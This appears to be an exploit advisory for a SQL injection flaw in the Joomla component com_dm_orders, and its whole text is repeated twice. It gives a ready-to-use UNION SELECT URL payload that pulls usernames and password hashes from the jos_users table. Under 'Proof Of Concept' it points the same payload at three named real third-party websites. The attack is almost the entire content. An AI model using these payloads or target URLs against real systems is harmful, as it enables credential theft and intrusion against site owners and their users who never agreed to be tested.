Joomla Components [ com_dm_orders ] SQL Injection Vuln
[o] com_dm_orders SQL Vulnerability
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1
[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54
Software : com_dm_orders [ joomla components ]
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1
[o] Proof Of Concept
http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
http://www.bluesplayer.dk/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=56
http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat%28username,0x3a,password%29,3,4,5,6,7,8,9+from+jos_users--&Itemid=54